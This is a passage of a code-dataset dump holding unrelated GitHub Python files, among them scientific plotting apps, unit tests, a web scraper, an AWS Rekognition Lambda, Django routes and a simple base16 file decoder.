isinstance(\n xd, zappy.beam.array.BeamZappyArray\n ): # TODO: fix this\n return\n xd = xd._repartition_chunks((3, 5))\n ncopies = 3\n xd.to_zarr(temp_store, xd.chunks, ncopies=ncopies)\n # read back as zarr directly and check it is the same as x\n z = zarr.open(\n temp_store,\n mode=\"r\",\n shape=(x.shape[0] * ncopies, x.shape[1]),\n dtype=x.dtype,\n chunks=(1, 5),\n )\n arr = z[:]\n x_ncopies = np.vstack((x,) * ncopies)\n assert_allclose(arr, x_ncopies)\n\n def test_zeros(self, zeros):\n totals = np.sum(zeros, axis=0)\n x = np.array([0, 0, 0, 0, 0])\n assert_allclose(np.asarray(totals), x)\n\n def test_ones(self, ones):\n totals = np.sum(ones, axis=0)\n x = np.array([3, 3, 3, 3, 3])\n assert_allclose(np.asarray(totals), x)\n\n def test_asndarrays(self, x, xd):\n if not isinstance(xd, zappy.executor.array.ExecutorZappyArray):\n return\n xd1, xd2 = zappy.executor.asndarrays((xd + 1, xd + 2))\n assert_allclose(xd1, x + 1)\n assert_allclose(xd2, x + 2)\n","repo_name":"lasersonlab/zappy","sub_path":"tests/test_array.py","file_name":"test_array.py","file_ext":"py","file_size_in_byte":13964,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"2979671614","text":"'''By listing the first six prime numbers: 2, 3, 5, 7, 11, and 13, we can see that the 6th prime is 13.\n\nWhat is the 10 001st prime number?'''\n\ncnt=0\n#We are starting from 2 because 1 is neither a composite number nor a prime number\ni=1 #I am initializing it as 1 because when the loop will start running then the value of i increases by 1 and becomes 2 \nwhile cnt!=10001:\n i+=1\n flag=True\n for x in range(2,i//2+1):\n if i%x==0:\n flag=False\n break\n if flag:\n cnt=cnt+1\n \nprint(\"The 10001st prime number is \",i)","repo_name":"cricsion/ProjectEulerSolutions","sub_path":"Problem7.py","file_name":"Problem7.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33573211019","text":"#!/usr/bin/python3\n\n#homemade \nimport LISA_GB_configuration as myGB\nimport LISA_noise_configuration as NOISE\nimport utils\n#lisa\nfrom fastgb.fastgb import FastGB\nimport lisaorbits\nimport lisaconstants\n#display module\nimport matplotlib.pyplot as plt\nimport streamlit.components.v1 as components\nimport plotly.express as px\nimport plotly.graph_objects as go\nimport streamlit as st\nfrom PIL import Image\n#common\nimport math as m\nimport numpy as np\nfrom scipy.interpolate import InterpolatedUnivariateSpline as spline\n\n\n\n#### main init\napptitle = 'FOM display facility'\nim = Image.open(\"images/lisa.ico\")\nst.set_page_config(page_title=apptitle,\n page_icon=im,\n layout=\"wide\")\n\n\n### data init\n# verification GB reader\ninput_gb_filename = \"data/VGB.npy\"\n\ngb_config_file = np.load(input_gb_filename)\nnb_of_sources = len(gb_config_file)\nGB_out = np.rec.fromarrays(\n [np.zeros((nb_of_sources, 1)),\n np.zeros((nb_of_sources, 1)),\n np.zeros((nb_of_sources, 1))],\n names=[\"freq\", \"sh\", \"snr\"]\n)\n\n\nlist_of_names = gb_config_file[\"Name\"]\n\nlist_of_names_opt = list_of_names\nlist_of_names_opt = np.append(\"select all\",list_of_names_opt)\n\n\n\n\nlist_of_sources = []\nlist_of_amplitude = []\n\n \n\nst.sidebar.header('Sources selection')\n\nlist_of_GB = st.sidebar.multiselect('Galactic Binaries', list_of_names_opt,placeholder='Select GB')\n\nif \"select all\" in list_of_GB:\n list_of_GB = list_of_names\n\n\nmission_duration = st.sidebar.slider('duration in year ?', min_value=1., max_value=10., step=0.5)\n\n#nb_of_GB = st.sidebar.slider('number of GB ?', min_value=0, max_value=max_nb_of_sources, step=1)\n\ntdi_type = st.sidebar.radio(\"select your TDI version\",\n [\"tdi1.5\",\"tdi2.0\"])#horizontal=True,)\n\nif tdi_type == \"tdi1.5\":\n tdi2 = False\nelif tdi_type == \"tdi2.0\":\n tdi2 = True\nelse:\n tdi2 = False\n\n\n#display mode\ndisplay_mode = st.sidebar.radio(\n \"select your display mode\",\n [\"x unified\",\"x\",\"closest\"])\n \n####### prepare the data\n#noise\ntest0 = NOISE.LISA_analytical_noise(\"dummy\", 42)\n\nfreq = np.logspace(-5, 0, 9990)\nduration = mission_duration # years\ntobs = duration * lisaconstants.SIDEREALYEAR_J2000DAY * 24 * 60 * 60\nlisa_orbits = lisaorbits.EqualArmlengthOrbits(dt=8640, size=(tobs + 10000) // 8640)\n# to control the +10000\n\n# noise psd\nSXX_noise_instru_only = test0.instru_noise_psd(freq, tdi2_=tdi2, option_=\"X\")\nSXX_confusion_noise_only = test0.confusion_noise_psd(freq, duration_=duration, tdi2_=tdi2, option_=\"X\")\nSXX_noise = SXX_noise_instru_only + SXX_confusion_noise_only\n\nSXY_noise_instru_only = test0.instru_noise_psd(freq, tdi2_=tdi2, option_=\"XY\")\nSXY_confusion_noise_only = test0.confusion_noise_psd(freq, duration_=duration, tdi2_=tdi2, option_=\"XY\")\nSXY_noise = SXY_noise_instru_only + SXX_confusion_noise_only\n\n\nSXX = spline(freq, SXX_noise)\nSXY = spline(freq, SXY_noise)\n\n# response\nR_ = utils.fast_response(freq, tdi2=tdi2)\nR = spline(freq, R_)\n# NOISE SENSITIVITY\nsh = spline(freq, SXX_noise_instru_only / R_)\nsh_wd = utils.psd2sh(freq, SXX_noise, sky_averaging=False, tdi2=tdi2)\n\n#signal\n\nGB = FastGB(delta_t=15, T=tobs, orbits=lisa_orbits, N=1024)\ndf = 1 / tobs\n\n\n\nfor j, s in enumerate(gb_config_file):\n\n pGW = dict(zip(gb_config_file.dtype.names, s))\n\n\n if pGW[\"Name\"] in list_of_GB:\n \n params = np.array( [pGW[\"Frequency\"],\n pGW[\"FrequencyDerivative\"],\n pGW[\"Amplitude\"],\n pGW[\"EclipticLatitude\"],\n pGW[\"EclipticLongitude\"],\n pGW[\"Polarization\"],\n pGW[\"Inclination\"],\n pGW[\"InitialPhase\"] ])\n \n source_tmp = myGB.LISA_GB_source(pGW[\"Name\"],params)\n list_of_sources.append(source_tmp)\n list_of_amplitude.append( source_tmp.get_source_parameters()[0][2]/(1e-23))\n\n X, Y, Z, kmin = GB.get_fd_tdixyz(source_tmp.get_source_parameters(), tdi2=True) \n X_f = df * np.arange(kmin, kmin + len(X.flatten()))\n \n h0 = np.sqrt(4 * df * float(np.sum(np.abs(X) ** 2 / R(X_f))))\n h0 *= np.sqrt(2)\n GB_out[\"sh\"][j] = h0**2\n GB_out[\"freq\"][j] = pGW[\"Frequency\"]\n\nlist_of_source = []\ntab_sensitivity, tab_waterfall = st.tabs([\"Sensitivity curve\", \"Waterfall plot\"])\n\n# st.error('Error message')\n# st.warning('Warning message')\n# st.info('Info message')\n# st.success('Success message')\n\n\n\n####### display the sensitivity curve\nvf= []\nvy = []\n\nfor vgb in GB_out:\n vf.append(float(vgb[\"freq\"]))\n vy.append(float(np.sqrt(vgb[\"freq\"] * vgb[\"sh\"])))\n\n## end of fake data\n\n# col1, col2 = st.columns([3,1])\n# col1.write('Figure')\n# col2.write('Buttons')\n\n\nfig = go.Figure()\n\ntmp = list_of_names.tolist()#list_of_GB\n\n\nfig.add_trace(go.Scatter(\n x=vf,\n y=vy,\n hovertext = tmp,\n #visible='legendonly',\n mode='markers',\n marker={'color':'red'},\n marker_symbol=\"hexagon\",\n name=\"GBs\",\n hovertemplate = \"%{hovertext}
f= %{x:.4f} Hz
h=%{y}\",\n))\n\nfig.add_trace(go.Scatter(\n x=freq,\n y=np.sqrt(freq) * np.sqrt(sh(freq)),\n name=\"Instrumental Noise\"\n))\n\n\nfig.add_trace(go.Scatter(\n x=freq,\n y=np.sqrt(freq) * np.sqrt(20 / 3) * np.sqrt(sh_wd(freq)),\n name=\"LISA Noise (Instru+Confusion)\"\n))\n\n\nfig.update_xaxes(title_text=\"Frequency (Hz)\", type=\"log\",showgrid=True,showexponent = 'all',exponentformat='e' )\nfig.update_yaxes(title_text=\"Characteristic Strain (TODO)\", type=\"log\",showgrid=True)\nfig.update_layout(xaxis=dict(range=[-5,0]))\nfig.update_layout(yaxis=dict(range=[-22,-15]))\nfig.update_layout(template=\"ggplot2\")\n\nfig.update_layout(hovermode=display_mode)\n\nfig.update_layout(legend=dict(orientation=\"h\",\n yanchor=\"bottom\",\n y=1.02,\n xanchor=\"right\",\n x=1\n )\n )\n\nfig.update_layout(height=600, width=1000)# , grid= {'rows': 7, 'columns': 6})\ntab_sensitivity.plotly_chart(fig, theme=None, use_container_width=True)\n\n\n\nfig2 = go.Figure()\nfig2.add_trace(go.Scatter(\n x=freq,\n y=SXX_noise_instru_only,\n name=\"instru\"\n))\n\nfig2.add_trace(go.Scatter(\n x=freq,\n y=SXX_confusion_noise_only,\n #visible='legendonly',\n name=\"confusion\"\n))\n\nfig2.update_xaxes(title_text=\"Frequency (Hz)\",\n type=\"log\",showgrid=True,showexponent = 'all',exponentformat='e' )\nfig2.update_yaxes(title_text=\"Characteristic Strain (TODO)\", type=\"log\",showgrid=True)\ntab_sensitivity.plotly_chart(fig2, theme=None, use_container_width=True)\n","repo_name":"lemiere/FOM_streamlit","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43550184303","text":"'''\n-*- coding: utf-8 -*-\n@Author : PlayerGuan\n@Time : 2020/11/26 16:12\n@File : run.py\n'''\n\n\nimport HTMLReport,unittest\nfrom setting.globalset import UiPath\nfrom tools.operation import Operation\n\n\nscreenshot_path = UiPath.screenshot_path\nreport_file = UiPath.report_path\nOperation().deleteAllFile(screenshot_path)\npath = Operation().makeFile(report_file)\n# create_cooke('prod')\nif __name__==\"__main__\":\n discover = unittest.defaultTestLoader.discover(UiPath.cases_path, pattern=\"test_*.py\", top_level_dir=None)\n runner = HTMLReport.TestRunner(\n report_file_name=\"report\",\n log_file_name=\"log\",\n output_path=path ,\n title= \"WebReport\",\n description= \"qiqiao\",\n thread_count=2,\n thread_start_wait= 5,\n sequential_execution=True,\n lang=\"cn\"\n )\n runner.run(discover)\n # Funcations().sendEmail(\"wangdongyi@do1.com.cn\",\"diaohuiyun@do1.com.cn\",\"wujianlun@do1.com.cn\",\"luolinyue@do1.com.cn\")","repo_name":"Donny2019/QiqiaoPlusAutoTest","sub_path":"ui/runner/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20419721714","text":"from watchdog.observers import Observer\nfrom watchdog.events import FileSystemEventHandler\nfrom logger import logger\nimport argparse\n\nfrom plate import new_plate, search_plate\n\n\nclass FileCreateHandler(FileSystemEventHandler):\n \"\"\" watchdog for new car image \"\"\"\n def on_created(self, event):\n\n dir = str(event.src_path)\n\n if '.' in dir:\n name_file = event.src_path[::-1]\n x = len(name_file) - name_file.find(\"/\")\n name_file = event.src_path[x:]\n logger.info(f'NEW IMAGE! {name_file}')\n\n logger.info(\"Created in: \" + event.src_path)\n search_plate(name_file, dir)\n\n else:\n logger.error(\"new file is directory !\")\n\n\nif __name__ == \"__main__\":\n\n event_handler = FileCreateHandler()\n\n \"\"\" create an observer. \"\"\"\n observer = Observer()\n\n \"\"\" attach the observer to the event handler. \"\"\"\n observer.schedule(event_handler, \"model/new_cars\", recursive=True)\n\n \"\"\" start the observer \"\"\"\n observer.start()\n\n try:\n while observer.is_alive():\n observer.join(1)\n finally:\n observer.stop()\n observer.join()\n","repo_name":"michal-broda/plate-detection","sub_path":"back.py","file_name":"back.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10620581644","text":"class Solution:\n def getKthMagicNumber(self, k: int) -> int:\n if k < 2: return k\n i3 = i5 = i7 = 0\n\n dp = [1] * k \n for i in range(1, k):\n dp[i] = min(dp[i3] * 3, dp[i5] * 5, dp[i7] * 7)\n if dp[i] == dp[i3] * 3: i3 += 1\n if dp[i] == dp[i5] * 5: i5 += 1\n if dp[i] == dp[i7] * 7: i7 += 1\n\n return dp[-1]","repo_name":"Dawinia/LeetCode","sub_path":"interview/面试题 17.09. 第 k 个数.py","file_name":"面试题 17.09. 第 k 个数.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"13035655443","text":"import pytest\n\nfrom bosdyn.api import lease_pb2, robot_command_pb2\nfrom bosdyn.api.graph_nav import graph_nav_pb2\nfrom bosdyn.client import lease\nfrom bosdyn.client.lease import LeaseWalletRequestProcessor\n\n\ndef test_get_lease_state():\n \"\"\"Check the LeaseWalletRequestProcessor.get_lease_state() method\"\"\"\n single_lease_unset_request = robot_command_pb2.RobotCommandRequest()\n single_lease_set_request = robot_command_pb2.RobotCommandRequest(lease=lease_pb2.Lease())\n no_lease_request = robot_command_pb2.RobotCommandFeedbackRequest()\n\n multi_lease, skip_mut = LeaseWalletRequestProcessor.get_lease_state(single_lease_unset_request)\n assert not multi_lease\n assert not skip_mut\n\n multi_lease, skip_mut = LeaseWalletRequestProcessor.get_lease_state(single_lease_set_request)\n assert not multi_lease\n assert skip_mut\n\n multi_lease, skip_mut = LeaseWalletRequestProcessor.get_lease_state(no_lease_request)\n assert multi_lease is None\n assert skip_mut\n\n\ndef test_resource_list():\n \"\"\"Test that using the resource list does the right thing.\"\"\"\n\n # Set up a lease wallet with an imaginary resource\n resource_name = 'test_resource'\n wallet = lease.LeaseWallet()\n wallet.client_name = 'test'\n lease_proto = lease.LeaseProto(resource=resource_name)\n lease_proto.sequence.append(1)\n lease_proto.client_names.append('root')\n lease_obj = lease.Lease(lease_proto)\n wallet.add(lease_obj)\n\n proc = LeaseWalletRequestProcessor(wallet, resource_list=(resource_name,))\n\n # Processor defaults to using our lease resource.\n request = graph_nav_pb2.NavigateToRequest()\n proc.mutate(request)\n\n assert len(request.leases) == 1\n assert request.leases[0].resource == resource_name\n assert request.leases[0].sequence == [1, 1]\n\n # Intentionally tell it that we *don't* want leases set.\n request = graph_nav_pb2.NavigateToRequest()\n proc.mutate(request, resource_list=())\n\n assert len(request.leases) == 0\n\n # Request a lease we don't have in the wallet.\n request = graph_nav_pb2.NavigateToRequest()\n with pytest.raises(lease.NoSuchLease):\n proc.mutate(request, resource_list=('body',))\n\n # Explicit lease overrides resource_list\n request = graph_nav_pb2.NavigateToRequest()\n request.leases.add().CopyFrom(lease_proto)\n proc.mutate(request, resource_list=('body',))\n\n assert len(request.leases) == 1\n assert request.leases[0] == lease_proto\n","repo_name":"boston-dynamics/spot-sdk","sub_path":"python/bosdyn-client/tests/test_lease_processor.py","file_name":"test_lease_processor.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","stars":2148,"dataset":"github-code","pt":"61"} +{"seq_id":"28527007807","text":"# !/usr/bin/env python3\r\n# program untuk dekripsi file\r\n# dibuat oleh rofi\r\n\r\nimport base64, os\r\nfrom base64 import b16decode\r\n\r\ndef dekripsi_nama_file(nama_file):\r\n nama_file_enkripsi = nama_file.encode()\r\n nama_file_bytes = b16decode(nama_file_enkripsi)\r\n nama_file_asli = nama_file_bytes.decode()\r\n return nama_file_asli\r\n\r\ndef dekripsi_file(file_enkripsi):\r\n file_enkripsi_bytes = b16decode(file_enkripsi)\r\n return file_enkripsi_bytes\r\n\r\nfile = input(\"\\nmasukan file yang mau didekripsi : \")\r\n\r\npemisah_extensions = os.path.splitext(file)\r\nhapus_extensions_encrypt = pemisah_extensions[0]\r\nnama_file_asli = dekripsi_nama_file(hapus_extensions_encrypt)\r\n\r\nwith open(file, \"rb\") as file_enkripsi:\r\n isi_file_enkripsi = file_enkripsi.read()\r\n \r\nwith open(nama_file_asli, \"wb\") as file_dekripsi:\r\n file_dekripsi.write(dekripsi_file(isi_file_enkripsi))\r\n file_dekripsi.close()\r\n os.system(f\"rm {file}\")\r\n print(\"file berhasil didekrisi\\n\")\r\n exit()\r\n","repo_name":"rofid0ank/EDB16","sub_path":"main/dekripsi.py","file_name":"dekripsi.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"id","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"39340011566","text":"from collections import defaultdict\nimport sys\n\nmax_node = float(\"inf\")\noutput_fname =\"wiki_adj_list.txt\"\nif len(sys.argv) == 2:\n max_node = int(sys.argv[1])\n output_fname = \"wiki_adj_list_\"+str(max_node)+\".txt\"\n\nadj_list = defaultdict(list)\nwith open (\"wiki_talk.txt\") as fin:\n for l in fin:\n if l[0] == \"#\":\n continue\n (s, t) = l.split(\"\\t\")\n t = t[:-1] # trim off newline\n if int(s) < max_node and int(t) < max_node:\n adj_list[s].append(t)\n\nwith open (output_fname, \"w\") as fout:\n for e in adj_list.keys():\n fout.write(e + \" \" + \" \".join(adj_list[e]) + \"\\n\")\n","repo_name":"yiming-fang/Hascade","sub_path":"data/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37592442301","text":"from django.urls import path\n\nfrom new_app import views\n\nurlpatterns = [\n\n path(\"\", views.index, name=\"index\"),\n path(\"dash\", views.dash, name=\"dash\"),\n path(\"login_page\", views.login_page, name=\"login_page\"),\n\n path(\"adminbase\", views.adminbase, name=\"adminbase\"),\n\n path(\"studentbase\", views.studentbase, name=\"studentbase\"),\n path(\"students_data\", views.students_data, name=\"students_data\"),\n path(\"students_data_view\", views.students_data_view, name=\"students_data_view\"),\n path(\"complaint\", views.complaint, name=\"complaint\"),\n path(\"view_complaint\", views.view_complaint, name=\"view_complaint\"),\n path(\"view\", views.view, name=\"view\"),\n path(\"reply_complaint//\", views.reply_complaint, name=\"reply_complaint\"),\n path(\"delete_data//\", views.delete_data, name=\"delete_data\"),\n path(\"delete_complaint//\", views.delete_complaint, name=\"delete_complaint\"),\n path(\"notification\", views.notification, name=\"notification\"),\n path(\"view_notification\", views.view_notification, name=\"view_notification\"),\n path(\"student_notification\", views.student_notification, name=\"student_notification\"),\n path(\"reply_notification//\", views.reply_notification, name=\"reply_notification\"),\n\n path(\"student_register\", views.student_register, name=\"student_register\"),\n path(\"logout_view\", views.logout_view, name=\"logout_view\"),\n\n]","repo_name":"afnaaffz/Task-Student","sub_path":"new_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40824571322","text":"import sys\nsys.path.append(\"/opt/\")\nimport boto3\nimport os\nimport sys\nimport uuid\nimport urllib.parse\nimport json\nfrom PIL import Image\nimport PIL.Image\n\nrekognition_client = boto3.client('rekognition', region_name='us-east-1')\ndynamodb = boto3.resource('dynamodb')\ns3 = boto3.client('s3')\n\ndef top(image_path, saved_location):\n with Image.open(image_path) as image_obj:\n width, height = image_obj.size\n cropped_image = image_obj.crop((width - 200, 0, width, 200))\n cropped_image.save(saved_location)\n\n\ndef save_to_dyanmodb(student_id:str, task:str, key:str, suffix:str, data):\n id = f\"{student_id}-{task}-{suffix}\"\n item ={\"id\": id, key: json.dumps(data)}\n table = dynamodb.Table(os.environ['LabDataTable'])\n db_response = table.put_item(\n Item=item\n )\n id = f\"{student_id}-{task}\"\n item ={\"id\": id, key: json.dumps(data)}\n db_response = table.put_item(\n Item=item\n )\n \ndef lambda_handler(event, context):\n if os.environ['AnalysisScreenShot'] == \"false\":\n print(\"AnalysisScreenShot Disabled!\")\n return \n \n for record in event['Records']:\n bucket = record['s3']['bucket']['name']\n key = record['s3']['object']['key']\n key = urllib.parse.unquote(key)\n\n segment = key.split(\"/\")\n student_id =segment[5].split(\"=\")[1]\n year = segment[1].split(\"=\")[1]\n month = segment[2].split(\"=\")[1]\n day = segment[3].split(\"=\")[1]\n hour = segment[4].split(\"=\")[1]\n minuite = segment[6].split(\"_\")[1]\n suffix = f\"{year}/{month}/{day}/{hour}/{minuite}\"\n \n download_path = '/tmp/{}.jpeg'.format(uuid.uuid4())\n s3.download_file(bucket, key, download_path)\n \n top(download_path, '/tmp/cropped.jpg')\n \n with open('/tmp/cropped.jpg', 'rb') as image:\n response = rekognition_client.detect_text(Image={'Bytes': image.read()})\n detected_text = response['TextDetections']\n with open(download_path, 'rb') as image:\n response = rekognition_client.detect_moderation_labels(Image={'Bytes': image.read()})\n moderation_labels = response['ModerationLabels']\n with open(download_path, 'rb') as image:\n response = rekognition_client.recognize_celebrities(Image={'Bytes': image.read()})\n celebrities = response['CelebrityFaces']\n\n print(detected_text)\n print(moderation_labels)\n print(celebrities)\n save_to_dyanmodb(student_id, \"TextDetections\", \"DetectedText\", suffix, detected_text)\n save_to_dyanmodb(student_id, \"ModerationLabels\", \"ModerationLabels\", suffix, moderation_labels)\n save_to_dyanmodb(student_id, \"CelebrityFaces\", \"CelebrityFaces\", suffix, celebrities)\n \n copy_source = {\n 'Bucket': bucket,\n 'Key': key\n }\n \n s3.copy_object( CopySource=copy_source,\n Bucket=os.environ['StudentMarkingBucket'],\n Key=f\"Screenshot/{student_id}.jpeg\",\n MetadataDirective='REPLACE',\n ContentType='image/jpeg')\n\n print(\"PutItem and copy object succeeded!\")\n \n \n","repo_name":"wongcyrus/labmonitor_collector","sub_path":"lambda_function/process_screenshot_function.py","file_name":"process_screenshot_function.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"18869541904","text":"import scrapy\nfrom scrapy.crawler import CrawlerRunner\nfrom dateutil.relativedelta import relativedelta\nfrom datetime import date, time, datetime, timedelta\nfrom scrapy.utils.project import get_project_settings\nfrom scrapy.utils.log import configure_logging\nfrom twisted.internet import reactor\n\n\nclass en_CNNSpider_spider(scrapy.Spider):\n name = 'en_CNN'\n allowed_domains = ['cnn.com']\n start_urls = []\n\n def __init__(self, start_date, end_date):\n self.start_date = start_date\n self.end_date = end_date\n self.start_time = datetime.combine(start_date, time())\n self.end_time = datetime.combine(end_date, time())\n\n start = self.start_time.replace(day=1)\n\n while start <= self.end_time:\n year = str(start.year)\n month = str(start.month)\n self.start_urls.append(f'https://edition.cnn.com/article/sitemap-{year}-{month}.html')\n start += relativedelta(months=1)\n\n\n def parse(self, response):\n\n articles = response.xpath('//div[@class=\"sitemap-entry\"]/ul/li')\n for article in articles:\n\n date_time_str = article.xpath('./span[@class=\"date\"]/text()').get()\n date_time = datetime.strptime(date_time_str, \"%Y-%m-%d\")\n \n if date_time < self.start_time:\n return\n elif date_time >= self.end_time:\n continue\n\n date = str(date_time.date())\n title = article.xpath('./span[@class=\"sitemap-link\"]/a/text()').get()\n url=response.urljoin(article.xpath(\".//@href\").get())\n\n yield scrapy.Request(url=url,\n callback=self.parse_article,\n cb_kwargs={\"date\": date, \"title\": title})\n\n\n def parse_article(self, response, *args, **kwargs):\n date = kwargs[\"date\"]\n title = kwargs[\"title\"]\n\n text_nodes = response.xpath('//div[@class=\"article__content\"]/p[@class=\"paragraph inline-placeholder\"]')\n texts=[''.join(text_node.xpath(\".//text()\").getall()).replace('\\n', \" \") for text_node in text_nodes if not text_node.xpath('.//script')]\n text = \"\\n\".join([t.strip() for t in texts if t.strip()]).replace(u'\\xa0', \" \").replace(u'\\u3000', \" \")\n if text and title:\n yield {\"date\": date,\n \"source\": self.name,\n \"title\": title.strip(),\n \"text\": text.strip()}\n\n\n def warn_on_generator_with_return_value_stub(spider, callable):\n pass\n scrapy.utils.misc.warn_on_generator_with_return_value = warn_on_generator_with_return_value_stub\n scrapy.core.scraper.warn_on_generator_with_return_value = warn_on_generator_with_return_value_stub\n\n","repo_name":"zouxunlong/web_crawl","sub_path":"web_crawl/spiders/en_CNN_spider.py","file_name":"en_CNN_spider.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4763690314","text":"#!/usr/bin/python\n# encoding:utf-8\n\n\"\"\"\n@author:jiat\n@contact:cctvjiatao@163.com\n@file:homework15.py\n@time:2018/5/6 12:26\n\"\"\"\n\nimport pandas as pd\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn import metrics\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n\nos.chdir(u'D:\\DataguruPyhton\\DataAnalysis\\diLesson15')\ndf = pd.read_table('ex15.txt', sep='\\s+', parse_dates=True, encoding='gb2312')\ny = df['y']\nx = (df.iloc[:, 0:3])\n\nx.corr()\n\n####多元线性回归分析####\nlinreg = LinearRegression()\nlinreg.fit(x, y)\nprint(linreg.intercept_)\n# 运行结果:-10.127988155231051\nprint(linreg.coef_)\n# 运行结果:[-0.05139616 0.58694904 0.28684868]\ny_pred = linreg.predict(x)\n# 误差评估\nprint(\"多元线性回归分析的MAE:\", metrics.mean_absolute_error(y, y_pred))\n# 运行结果:多元线性回归分析的MAE: 0.3233899552716768\nprint(\"多元线性回归分析的MSE:\", metrics.mean_squared_error(y, y_pred))\n# 运行结果:多元线性回归分析的MSE: 0.15208631466626785\nprint(\"多元线性回归分析的RMSE:\", np.sqrt(metrics.mean_squared_error(y, y_pred)))\n# 运行结果:多元线性回归分析的RMSE: 0.38998245430566214\nprint(\"多元线性回归分析的得分\", linreg.score(x, y))\n# 运行结果:多元线性回归分析的得分 0.9918965520557045\n\n####主成分分析####\npca = PCA()\npca.fit(x)\nprint(pca.explained_variance_ratio_) # 主成分为1个\n\npac = PCA(n_components=1)\nreduced_x = pac.fit_transform(x)\n\nlinreg2 = LinearRegression()\nlinreg2.fit(reduced_x, y)\nprint(linreg2.intercept_)\n# 运行结果:[0.99676249 0.00209367 0.00114384]\nprint(linreg2.coef_)\n# 运行结果:21.89090909090909\ny_pred2 = linreg2.predict(reduced_x)\n# 误差评估\n\nprint(\"主成分分析的MAE:\", metrics.mean_absolute_error(y, y_pred2))\n# 运行结果:主成分分析的MAE: 0.8936859420929342\nprint(\"主成分分析的MSE:\", metrics.mean_squared_error(y, y_pred2))\n# 运行结果:主成分分析的MSE: 1.182503150421625\nprint(\"主成分分析的RMSE:\", np.sqrt(metrics.mean_squared_error(y, y_pred2)))\n# 运行结果:主成分分析的RMSE: 1.087429607111019\nprint(\"主成分分析的得分:\", linreg2.score(reduced_x, y))\n# 运行结果:主成分分析的得分: 0.9369939843408384\n\n#####画图#####\n# 作图,比较实际值y,多元线性回归模型预测值y_pred,主成分分析模型的预测值y_pred2进行比较,直观展现模型的准确度\nk = range(1, 12)\nplt.scatter(k, y, c='r', marker='x')\nplt.scatter(k, y_pred, c='b', marker='D')\nplt.scatter(k, y_pred2, c='g', marker='.')\nplt.show()\n","repo_name":"jt1024/DataAnalysis","sub_path":"diLesson15/homework15.py","file_name":"homework15.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31840993530","text":"import streamlit as st\nimport numpy as np\nimport pandas as pd\nfrom universal import tools, algos\nfrom universal.algos import *\n\ndef app():\n ### Create Title\n st.title(\"Summarize\")\n ### Add a picture\n st.header('Paramètres de prédiction')\n st.markdown('### Choix du modèle et optimisation')\n st.write(\"Dans un premier temps, nous avons fait fonctionner la totalité des algorithmes disponibles par périodes.\")\n st.write(\"Puis, nous avons dressé un tableau, résumant pour chaque algorithme les métriques calculées (ratio de Sharpe et rendement cumulatif) :\")\n st.write(\"Nous avons remarqué que l’algorithme Best_Markowitz et BCRP avait tendance à surperformer les autres.\") \n\n\n Scenar_crypto_path = ['assets/cryptos/année_2018_DF.csv', 'assets/cryptos/année_2018_flat_DF.csv','assets/cryptos/année_2019_flat_DF.csv','assets/cryptos/année_2021_Nov_DF.csv',\n 'assets/cryptos/année_2021_Oct_DF.csv', 'assets/cryptos/covid_DF.csv', 'assets/cryptos/ukr_war_DF.csv']\n Scenar_nasdaq_path = ['assets/nasdaq/année_2018_DF.csv', 'assets/nasdaq/année_2018_flat_DF.csv','assets/nasdaq/année_2019_flat_DF.csv','assets/nasdaq/année_2021_Nov_DF.csv', 'assets/nasdaq/année_2021_Oct_DF.csv',\n 'assets/nasdaq/covid_DF.csv', 'assets/nasdaq/new_millennium_DF.csv', 'assets/nasdaq/subprimes_DF.csv', 'assets/nasdaq/ukr_war_DF.csv']\n\n Scenar_crypto = ['année_2018_DF', 'année_2018_flat_DF','année_2019_flat_DF','année_2021_Nov_DF', 'année_2021_Oct_DF',\n 'covid_DF', 'ukr_war_DF']\n Scenar_nasdaq = ['année_2018_DF', 'année_2018_flat_DF','année_2019_flat_DF','année_2021_Nov_DF', 'année_2021_Oct_DF',\n 'covid_DF', 'new_millennium_DF', 'subprimes_DF' 'ukr_war_DF']\n\n\n\n algorithmes = [ algos.Anticor(), algos.BAH(), algos.BCRP(), algos.BestMarkowitz(), algos.BestSoFar(), algos.BNN(),\n algos.CORN(), algos.CRP(), algos.CWMR(), algos.DynamicCRP(), algos.EG(), algos.OLMAR(), algos.ONS(),\n algos.PAMR(), algos.RMR()]\n noms_algos = ['Anticor', 'BAH', 'BCRP', 'BestMarkowitz', 'BestSoFar', 'BNN', 'CORN', 'CRP', 'CWMR', 'DynamicCRP',\n 'EG', 'OLMAR', 'ONS', 'PAMR', 'RMR']\n metric_name = ['Ratio de Sharpe', 'beta']\n #Mesure de performance\n def perform(result):\n return result.sharpe , result.alpha_beta()[1]\n\n market_list = [\"Crypto\", \"Nasdaq\"]\n market = st.radio(\"Sélectionnez le marché 